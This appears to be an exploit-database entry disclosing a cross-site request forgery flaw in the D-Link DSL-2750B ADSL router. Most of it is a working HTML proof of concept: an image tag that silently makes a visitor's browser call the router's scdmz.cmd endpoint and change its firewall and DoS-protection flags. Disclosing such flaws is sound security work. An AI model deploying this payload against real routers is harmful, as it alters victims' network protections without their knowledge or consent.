D-Link DSL-2750B ADSL Route' - Cross-Site Request Forgery

Author: killall-9
type: webapps
platform: hardware
port: 80.0
date_added: 2014-02-11 
date_updated: 2014-02-11 
verified: 0 
codes: OSVDB-103350 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title : D-Link DSL-2750B (ADSL Router) CSRF Vulnerability
# Date : 10-02-2014
# Author : killall-9@mail.com
# Vendor site : http://www.d-link.com
# Version : DSL-2750B
# Tested on : Firmware Version: EU_2.02; Hardware Version: B1

The D-Link DSL-2750B's web interface (listening on tcp/ip port 80) is prone to CSRF vulnerabilities which allows to change router parameters.

POC=>

<html lang="en">
<head>
<title>Pinata-CSRF-poc for D-Link</title>
</head>
<body>
<img src="http://192.168.1.1/scdmz.cmd?&fwFlag=50853375&dosenbl=1" />
</body>
</html>

cincin°°°